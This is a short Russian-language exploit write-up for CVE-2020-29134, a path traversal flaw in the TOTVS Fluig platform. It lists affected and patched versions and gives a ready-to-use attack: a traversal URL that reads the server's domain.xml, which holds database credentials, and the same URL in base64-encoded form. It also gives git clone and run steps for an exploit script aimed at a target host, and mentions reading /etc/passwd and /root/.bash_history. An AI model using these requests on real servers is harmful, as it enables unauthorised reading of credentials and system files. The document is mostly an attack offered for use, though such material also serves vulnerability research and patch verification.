
Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal
Fluig — это платформа для повышения производительности и совместной работы, которая интегрируется с ERP-системой
и другими системами вашей компании, чтобы революционизировать то, как вы и ваша команда работаете.
Платформа TOTVS Fluig допускает обход пути через параметр, закодированный в base64.
При эксплуатации эта уязвимость позволяет читать конфиденциальные XML-файлы, которые содержат
данные для доступа к базе данных и, в некоторых случаях, подключения LDAP и интеграции с ERP-системой.
Кроме того, также возможно исследовать системные файлы, такие как /etc/passwd и /root/.bash_history
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...
<== Fluig Lake 1.7.0-210303 (Исправлено)
<== Fluig 1.6.5-210308 (Исправлено)
<== Fluig 1.6.4-210308 (Исправлено)

http://fluig.host.com/volume/stream/Rmx1aWc=/
?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml
P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
https://www.exploit-db.com/exploits/49622
# git clone https://github.com/lucxssouza/CVE-2020-29134.git
# cd CVE-2020-29134
# chmod +x xfluig.sh
Пример 1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (количество запросов, генерируемых wfuzz)
Пример 2: ./xfluig.sh http://fluig.host.com:PORT